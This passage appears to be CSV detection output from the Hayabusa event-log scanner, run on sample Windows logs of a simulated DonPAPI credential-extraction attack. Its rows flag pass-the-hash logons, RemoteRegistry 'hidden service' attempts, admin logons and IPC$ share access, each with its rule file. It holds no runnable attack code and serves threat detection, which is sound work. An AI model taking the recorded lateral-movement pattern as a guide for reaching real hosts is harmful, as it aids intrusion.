0x8724935,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:16:04.127 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share 
Path: | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.189 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.269 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249a8 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 
0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.333 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: 
RemoteRegistry | User: admmig | LID: 0x87249e1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 
0x8724a17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.382 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724a17 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 
0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.476 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ba1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service 
Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.539 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724bd7 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 
%%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.601 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c0d | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.664 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c46 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network 
Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.743 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724d99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | 
IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.821 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible 
